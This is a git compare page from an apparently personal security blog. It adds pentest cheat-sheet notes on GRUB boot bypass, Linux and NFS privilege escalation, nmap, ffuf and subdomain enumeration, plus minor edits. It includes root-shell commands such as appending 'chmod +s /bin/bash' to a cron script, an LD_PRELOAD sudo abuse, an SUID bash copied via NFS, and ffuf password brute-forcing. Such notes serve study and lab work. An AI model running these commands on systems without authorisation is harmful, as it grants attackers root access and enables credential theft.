mirror of
https://github.com/anotherhadi/blog.git
synced 2026-07-07 01:02:34 +02:00
Compare commits
3 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| aa86366b7f | |||
| 198112501a | |||
| 15f2b6c184 |
+1
-1
@@ -19,7 +19,7 @@
|
||||
"@lucide/astro": "^0.552.0",
|
||||
"@tailwindcss/vite": "^4.2.4",
|
||||
"@types/bun": "^1.3.13",
|
||||
"astro": "6.1.9",
|
||||
"astro": "6.4.6",
|
||||
"daisyui": "^5.5.19",
|
||||
"node-html-parser": "^7.1.0",
|
||||
"svelte": "^5.55.5",
|
||||
|
||||
@@ -0,0 +1,67 @@
|
||||
---
|
||||
title: "GRUB Boot Bypass"
|
||||
description: "Physical access techniques to get a root shell by editing GRUB boot parameters."
|
||||
tags: ["linux", "grub", "physical-access", "privesc"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
When GRUB is not password-protected, anyone with physical access can edit boot parameters and bypass authentication entirely.
|
||||
|
||||
At the GRUB menu, press **`e`** to edit the selected entry. Modify the line starting with `linux`, then press **`F10`** to boot.
|
||||
|
||||
## Techniques
|
||||
|
||||
### init=/bin/sh
|
||||
|
||||
Replaces the init process with a shell; drops directly into a root shell before any login prompt.
|
||||
|
||||
```
|
||||
linux ... init=/bin/sh
|
||||
```
|
||||
|
||||
Filesystem is mounted read-only by default. Remount to make changes:
|
||||
|
||||
```bash
|
||||
mount -o remount,rw /
|
||||
```
|
||||
|
||||
### init=/bin/bash
|
||||
|
||||
Same as above but uses bash. Add `rw` on the `linux` line to mount read-write from the start:
|
||||
|
||||
```
|
||||
linux ... rw init=/bin/bash
|
||||
```
|
||||
|
||||
### rd.break (systemd)
|
||||
|
||||
Interrupts the boot process in the initramfs, before the real root filesystem is mounted. Useful for resetting the root password.
|
||||
|
||||
```
|
||||
linux ... rd.break
|
||||
```
|
||||
|
||||
From the initramfs shell:
|
||||
|
||||
```bash
|
||||
mount -o remount,rw /sysroot
|
||||
chroot /sysroot
|
||||
passwd root
|
||||
exit
|
||||
```
|
||||
|
||||
### single (single-user mode)
|
||||
|
||||
Boots into maintenance mode. On some distros this drops to a root shell without a password prompt (not Debian/Ubuntu).
|
||||
|
||||
```
|
||||
linux ... single
|
||||
```
|
||||
|
||||
### systemd.unit=rescue.target
|
||||
|
||||
systemd equivalent of single-user mode: minimal services, root shell.
|
||||
|
||||
```
|
||||
linux ... systemd.unit=rescue.target
|
||||
```
|
||||
@@ -0,0 +1,80 @@
|
||||
---
|
||||
title: "Linux Privilege Escalation"
|
||||
description: "Common misconfigurations and weaknesses to check when escalating privileges on Linux."
|
||||
tags: ["linux", "privesc", "post-exploitation"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
## Sudo
|
||||
|
||||
```bash
|
||||
sudo -l
|
||||
```
|
||||
|
||||
Check [GTFOBins](https://gtfobins.github.io) for any listed binary.
|
||||
|
||||
If `env_keep+=LD_PRELOAD` is set:
|
||||
|
||||
```bash
|
||||
# compile a shared lib that spawns a shell
|
||||
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
|
||||
sudo LD_PRELOAD=/tmp/shell.so <allowed_binary>
|
||||
```
|
||||
|
||||
## SUID / SGID
|
||||
|
||||
```bash
|
||||
find / -user root -perm -4000 -ls 2>/dev/null # SUID
|
||||
find / -group root -perm -2000 -ls 2>/dev/null # SGID
|
||||
```
|
||||
|
||||
Check any non-standard binary on GTFOBins.
|
||||
|
||||
## Misconfiguration
|
||||
|
||||
```bash
|
||||
# World-writable directories
|
||||
find / -type d -perm -2 -ls 2>/dev/null
|
||||
|
||||
# World-writable files owned by root
|
||||
find / -user root -perm -2 ! -type l -ls 2>/dev/null
|
||||
```
|
||||
|
||||
## Cron Jobs
|
||||
|
||||
```bash
|
||||
cat /etc/crontab
|
||||
ls -la /etc/cron.*
|
||||
crontab -l
|
||||
```
|
||||
|
||||
If a cron runs a script you can write to, replace its content:
|
||||
|
||||
```bash
|
||||
echo 'chmod +s /bin/bash' >> /path/to/script.sh
|
||||
```
|
||||
|
||||
If the cron uses a relative PATH and a directory is writable, drop a malicious binary earlier in `$PATH`.
|
||||
|
||||
## Capabilities
|
||||
|
||||
```bash
|
||||
getcap -r / 2>/dev/null
|
||||
```
|
||||
|
||||
Dangerous capabilities: `cap_setuid`, `cap_net_raw`, `cap_dac_override`.
|
||||
Check [GTFOBins](https://gtfobins.github.io) for exploitation.
|
||||
|
||||
## Kernel Exploits
|
||||
|
||||
```bash
|
||||
uname -r
|
||||
searchsploit linux kernel $(uname -r)
|
||||
```
|
||||
|
||||
## LinPEAS / WinPEAS
|
||||
|
||||
Automated enumeration scripts to surface privesc vectors quickly.
|
||||
|
||||
- [LinPEAS (linux)](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS)
|
||||
- [WinPEAS (windows)](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS)
|
||||
@@ -5,8 +5,6 @@ tags: ["ftp", "network", "service"]
|
||||
publishDate: 2026-04-29
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
FTP runs on **port 21** (control) and uses a secondary data channel (port 20 for active, ephemeral port for passive).
|
||||
Common implementations: vsftpd, ProFTPD, Pure-FTPd, FileZilla Server, IIS FTP.
|
||||
|
||||
|
||||
@@ -0,0 +1,79 @@
|
||||
---
|
||||
title: "NFS"
|
||||
description: "Enumeration, mounting and privilege escalation techniques for NFS shares."
|
||||
tags: ["nfs", "network", "service"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
NFS (Network File System) runs on **port 2049** and allows remote filesystem mounting over the network.
|
||||
Common on Linux/Unix environments. Access control is defined in `/etc/exports` on the server.
|
||||
|
||||
## Enumeration
|
||||
|
||||
### Nmap
|
||||
|
||||
```bash
|
||||
nmap -sV -p 111,2049 $IP
|
||||
nmap -p 111,2049 --script nfs-* $IP
|
||||
```
|
||||
|
||||
Key scripts:
|
||||
|
||||
- `nfs-showmount`: lists exported shares
|
||||
- `nfs-ls`: lists files in shares
|
||||
- `nfs-statfs`: retrieves disk stats
|
||||
|
||||
### List shares
|
||||
|
||||
```bash
|
||||
showmount -e $IP
|
||||
rpcinfo -p $IP
|
||||
```
|
||||
|
||||
## Mount
|
||||
|
||||
```bash
|
||||
mkdir /mnt/nfs
|
||||
mount -t nfs $IP:/share /mnt/nfs
|
||||
mount -t nfs -o vers=2 $IP:/share /mnt/nfs # force NFSv2
|
||||
umount /mnt/nfs
|
||||
```
|
||||
|
||||
## Privilege Escalation
|
||||
|
||||
### no_root_squash
|
||||
|
||||
If the share is exported with `no_root_squash`, the remote root user keeps root privileges on the share.
|
||||
|
||||
Check `/etc/exports` on the server (if readable):
|
||||
|
||||
```bash
|
||||
cat /etc/exports
|
||||
```
|
||||
|
||||
Look for:
|
||||
|
||||
```
|
||||
/share *(rw,no_root_squash)
|
||||
```
|
||||
|
||||
If present, copy a SUID binary onto the share as root from your attacker machine:
|
||||
|
||||
```bash
|
||||
cp /bin/bash /mnt/nfs/bash
|
||||
chmod +s /mnt/nfs/bash
|
||||
```
|
||||
|
||||
Then execute it on the target with `-p` to keep the SUID effective UID:
|
||||
|
||||
```bash
|
||||
/tmp/nfs/bash -p
|
||||
```
|
||||
|
||||
### UID spoofing
|
||||
|
||||
NFS authenticates by UID. If you know a file is owned by UID 1001 on the server, impersonate it directly:
|
||||
|
||||
```bash
|
||||
python3 -c "import os; os.setuid(1001); os.system('/bin/bash')"
|
||||
```
|
||||
@@ -0,0 +1,108 @@
|
||||
---
|
||||
title: "Nmap"
|
||||
description: "Host discovery, port scanning, service detection and NSE scripting"
|
||||
tags: ["nmap", "network", "enumeration"]
|
||||
publishDate: 2026-05-18
|
||||
---
|
||||
|
||||
Nmap is a network scanner used for host discovery, port scanning, service/version detection, OS fingerprinting, and vulnerability scripting via NSE.
|
||||
|
||||
## Host Discovery
|
||||
|
||||
```bash
|
||||
nmap -sn 192.168.1.0/24 # ping sweep, no port scan
|
||||
nmap -sn -PR 192.168.1.0/24 # ARP ping (local network)
|
||||
nmap -Pn $IP # skip host discovery, treat as up
|
||||
```
|
||||
|
||||
## Port Scanning
|
||||
|
||||
```bash
|
||||
nmap $IP # top 1000 ports (SYN scan if root)
|
||||
nmap -p 80,443,8080 $IP # specific ports
|
||||
nmap -p 1-65535 $IP # all ports
|
||||
nmap -p- $IP # shorthand for all ports
|
||||
nmap -sU $IP # UDP scan
|
||||
nmap -sU -sS $IP # UDP + SYN together
|
||||
```
|
||||
|
||||
Scan types:
|
||||
|
||||
- `-sS`: SYN scan (stealth, requires root)
|
||||
- `-sT`: TCP connect scan (no root needed)
|
||||
- `-sU`: UDP scan
|
||||
- `-sA`: ACK scan (firewall rule mapping)
|
||||
- `-sN/sF/sX`: Null, FIN, Xmas (evasion, unreliable on Windows)
|
||||
|
||||
## Service & Version Detection
|
||||
|
||||
```bash
|
||||
nmap -sV $IP
|
||||
nmap -sV --version-intensity 9 $IP # more aggressive probing
|
||||
```
|
||||
|
||||
## OS Detection
|
||||
|
||||
```bash
|
||||
nmap -O $IP
|
||||
nmap -O --osscan-guess $IP # guess if not confident
|
||||
```
|
||||
|
||||
## Aggressive Scan
|
||||
|
||||
```bash
|
||||
nmap -A $IP # -sV -O --script=default --traceroute
|
||||
```
|
||||
|
||||
## Timing Templates
|
||||
|
||||
```bash
|
||||
nmap -T0 $IP # paranoid (IDS evasion, very slow)
|
||||
nmap -T1 $IP # sneaky
|
||||
nmap -T3 $IP # normal (default)
|
||||
nmap -T4 $IP # aggressive (faster, good for CTFs)
|
||||
nmap -T5 $IP # insane (may miss results)
|
||||
```
|
||||
|
||||
## NSE Scripts
|
||||
|
||||
```bash
|
||||
nmap --script default $IP
|
||||
nmap --script vuln $IP
|
||||
nmap --script "ftp-*" $IP
|
||||
nmap --script safe $IP
|
||||
nmap --script $script --script-args user=$user,pass=$password $IP
|
||||
```
|
||||
|
||||
Common script categories: `auth`, `brute`, `default`, `discovery`, `dos`, `exploit`, `intrusive`, `safe`, `version`, `vuln`.
|
||||
|
||||
Scripts are located in `/usr/share/nmap/scripts/`.
|
||||
|
||||
## Output Formats
|
||||
|
||||
```bash
|
||||
nmap -oN output.txt $IP # normal
|
||||
nmap -oX output.xml $IP # XML
|
||||
nmap -oG output.gnmap $IP # grepable
|
||||
nmap -oA output $IP # all three at once
|
||||
```
|
||||
|
||||
## Common Profiles
|
||||
|
||||
Quick full scan:
|
||||
|
||||
```bash
|
||||
nmap -p- -T4 --min-rate 5000 -sV -sC -oA full $IP
|
||||
```
|
||||
|
||||
CTF/lab initial recon:
|
||||
|
||||
```bash
|
||||
nmap -sV -sC -p- --open $IP
|
||||
```
|
||||
|
||||
UDP top ports:
|
||||
|
||||
```bash
|
||||
nmap -sU --top-ports 100 $IP
|
||||
```
|
||||
@@ -5,8 +5,6 @@ tags: ["rdp", "network", "service"]
|
||||
publishDate: 2026-05-04
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session.
|
||||
Common on Windows servers and workstations.
|
||||
|
||||
|
||||
@@ -5,8 +5,6 @@ tags: ["ssh", "network", "service"]
|
||||
publishDate: 2026-05-04
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
SSH runs on **port 22** and provides an encrypted remote shell.
|
||||
Common implementations: OpenSSH, Dropbear, Bitvise.
|
||||
|
||||
|
||||
@@ -5,8 +5,6 @@ tags: ["telnet", "network", "service"]
|
||||
publishDate: 2026-05-04
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
Telnet runs on **port 23** and transmits all data (including credentials) in **cleartext**.
|
||||
Common on embedded devices, legacy systems, routers, and IoT equipment.
|
||||
|
||||
|
||||
@@ -32,7 +32,7 @@ If the page has been taken down or modified, the cached version may still show t
|
||||
|
||||
## Domain History
|
||||
|
||||
[VirusTotal](https://www.virustotal.com) shows the historical DNS records, subdomains, and associated IPs for any domain — useful when a site has moved or been taken down.
|
||||
[VirusTotal](https://www.virustotal.com) shows the historical DNS records, subdomains, and associated IPs for any domaint useful when a site has moved or been taken down.
|
||||
|
||||
[ViewDNS.info](https://viewdns.info) covers WHOIS history, reverse IP, reverse MX, and port scans from a single interface.
|
||||
|
||||
|
||||
@@ -44,9 +44,9 @@ tweet_id = 1234567890123456789
|
||||
timestamp_ms = (tweet_id >> 22) + 1288834974657
|
||||
```
|
||||
|
||||
`1288834974657` is Twitter's custom epoch (Nov 4, 2010). Works on both tweet IDs and user IDs — useful to confirm account creation date without needing profile metadata.
|
||||
`1288834974657` is Twitter's custom epoch (Nov 4, 2010). Works on both tweet IDs and user IDs: useful to confirm account creation date without needing profile metadata.
|
||||
|
||||
Several online converters exist if you don't want to do it manually — search "snowflake id decoder".
|
||||
Several online converters exist if you don't want to do it manually: search "snowflake id decoder".
|
||||
|
||||
### Direct profile URL by ID
|
||||
|
||||
|
||||
@@ -0,0 +1,38 @@
|
||||
---
|
||||
title: "Directory Discovery"
|
||||
description: "Techniques and tools for discovering hidden directories and files on web servers."
|
||||
tags: ["web", "enumeration", "discovery", "directory"]
|
||||
publishDate: 2026-06-01
|
||||
---
|
||||
|
||||
## FFUF
|
||||
|
||||
See also [FFUF](/notes/web/ffuf) for fuzzing-based directory discovery.
|
||||
|
||||
## Robots.txt
|
||||
|
||||
```bash
|
||||
curl -s $url/robots.txt
|
||||
```
|
||||
|
||||
## Sitemap.xml
|
||||
|
||||
```bash
|
||||
curl -s $url/sitemap.xml
|
||||
```
|
||||
|
||||
## Dirb
|
||||
|
||||
```bash
|
||||
dirb $url
|
||||
```
|
||||
|
||||
## Spider - Katana
|
||||
|
||||
A spider is a tool that crawls a website and collects information about its
|
||||
structure and content. It can be used to find hidden directories, files, and
|
||||
parameters.
|
||||
|
||||
```bash
|
||||
katana -c 15 -p 15 -u $url > output
|
||||
```
|
||||
@@ -0,0 +1,33 @@
|
||||
---
|
||||
title: "FFUF"
|
||||
description: "Reference and usage examples for ffuf, a fast web fuzzer for directories, endpoints and subdomains."
|
||||
tags:
|
||||
["web", "enumeration", "discovery", "subdomain", "directory", "bruteforce"]
|
||||
publishDate: 2026-06-01
|
||||
---
|
||||
|
||||
**Fuff (or ffuf)** is a fast web fuzzer written in Go, mainly used in
|
||||
cybersecurity to discover hidden directories, files, API endpoints, subdomains,
|
||||
vhosts and more. Its speed and flexibility make it a must-have for pentesters
|
||||
and bug bounty hunters.
|
||||
|
||||
```bash
|
||||
# Flags:
|
||||
# -rate 50 -t 50 # Limit requests to 50 per second with 50 concurrent threads
|
||||
# -X POST|GET|PUT # Set method
|
||||
# -e .php,.asp,.bak,.db # Set the extension
|
||||
# -recursion -recursion-depth 3 # Recursive fuzzing up to 3 levels deep
|
||||
# -fc 404,500 # Exclude responses with status codes 404 and 500
|
||||
|
||||
# Examples:
|
||||
ffuf -w wordlist.txt -u $url/FUZZ # Basic directory/file fuzzing using a wordlist
|
||||
ffuf -w subdomains.txt -u https://FUZZ.$url # Subdomain fuzzing
|
||||
ffuf -w vhosts.txt -u $url -H "Host: https://FUZZ.$url" # Virtual host fuzzing by modifying the Host header
|
||||
ffuf -w wordlist.txt -u $url/page.php?FUZZ=value # GET parameter fuzzing in the query string
|
||||
ffuf -w wordlist.txt -u $url/api -X POST -d 'FUZZ=value' # POST body parameter fuzzing
|
||||
ffuf -w wordlist.txt -u $url/FUZZ -b 'session=abcdef' # Use a session cookie during fuzzing
|
||||
ffuf -w headers.txt -u $url -H "X-Custom-Header: FUZZ" # HTTP header fuzzing
|
||||
ffuf -w passwords.txt -X POST -u $url/login -d "username=admin&password=FUZZ" # Password brute-forcing for user "admin"
|
||||
ffuf -w users.txt:USER -w passwords.txt:PASS -u "$url/login?username=USER&password=PASS" -mode pitchfork # Pitchfork mode: matches each line from both wordlists (USER[i], PASS[i])
|
||||
ffuf -w users.txt:USER -w passwords.txt:PASS -u "$url/login?username=USER&password=PASS" -mode clusterbomb # Clusterbomb mode: tests every user with every password combination
|
||||
```
|
||||
@@ -0,0 +1,85 @@
|
||||
---
|
||||
title: "Subdomains Discovery"
|
||||
description: "Methods and tools for enumerating subdomains of a target domain."
|
||||
tags: ["web", "enumeration", "discovery", "subdomain"]
|
||||
publishDate: 2026-06-01
|
||||
---
|
||||
|
||||
## FFUF
|
||||
|
||||
See also [FFUF](/notes/web/ffuf) for fuzzing-based subdomain discovery.
|
||||
|
||||
## Google Dorking
|
||||
|
||||
Google dorks can surface subdomains indexed by Google without any active scanning.
|
||||
|
||||
```
|
||||
site:*.$domain
|
||||
site:*.$domain -www
|
||||
site:*.$domain inurl:admin
|
||||
site:*.$domain ext:php | ext:json | ext:xml
|
||||
```
|
||||
|
||||
## Certificate Transparency
|
||||
|
||||
CT logs record every TLS certificate ever issued for a domain. Querying them is
|
||||
passive and reliable.
|
||||
|
||||
```bash
|
||||
curl -s "https://crt.sh/?q=%25.$domain&output=json" | jq '.[].name_value' | sort -u
|
||||
```
|
||||
|
||||
Tools that aggregate CT logs:
|
||||
|
||||
- [crt.sh](https://crt.sh)
|
||||
- [censys.io](https://search.censys.io)
|
||||
|
||||
## Passive DNS
|
||||
|
||||
Passive DNS databases store historical DNS resolutions collected from resolvers
|
||||
worldwide; useful for finding subdomains that no longer resolve but once did.
|
||||
|
||||
```bash
|
||||
# Amass (passive mode, no active scanning)
|
||||
amass enum -passive -d $domain
|
||||
|
||||
# subfinder (uses many passive sources)
|
||||
subfinder -d $domain -silent
|
||||
```
|
||||
|
||||
## DMARC
|
||||
|
||||
DMARC can reveal more domains associated with a target.
|
||||
|
||||
Go to `dmarc.live/info/$domain`, it allows you to find domains using the
|
||||
same DMARC record.
|
||||
|
||||
## ASN & IP Ranges
|
||||
|
||||
Finding the ASN of a target exposes its entire IP range, which may contain
|
||||
undiscovered subdomains or related infrastructure.
|
||||
|
||||
```bash
|
||||
# Get ASN from an IP
|
||||
whois $ip | grep -i "asn\|orgname\|origin"
|
||||
|
||||
# Get IP ranges from ASN
|
||||
whois -h whois.radb.net -- '-i origin AS12345' | grep route
|
||||
```
|
||||
|
||||
## Favicon Hash
|
||||
|
||||
A unique favicon can be fingerprinted to find other domains hosted by the same
|
||||
organisation, including subdomains on non-standard ports.
|
||||
|
||||
```bash
|
||||
# Compute the MMH3 hash of the favicon
|
||||
python3 -c "
|
||||
import requests, mmh3, base64
|
||||
r = requests.get('https://$domain/favicon.ico')
|
||||
h = mmh3.hash(base64.encodebytes(r.content))
|
||||
print(h)
|
||||
"
|
||||
```
|
||||
|
||||
Then search the hash on [Shodan](https://shodan.io): `http.favicon.hash:<hash>`
|
||||
Reference in New Issue
Block a user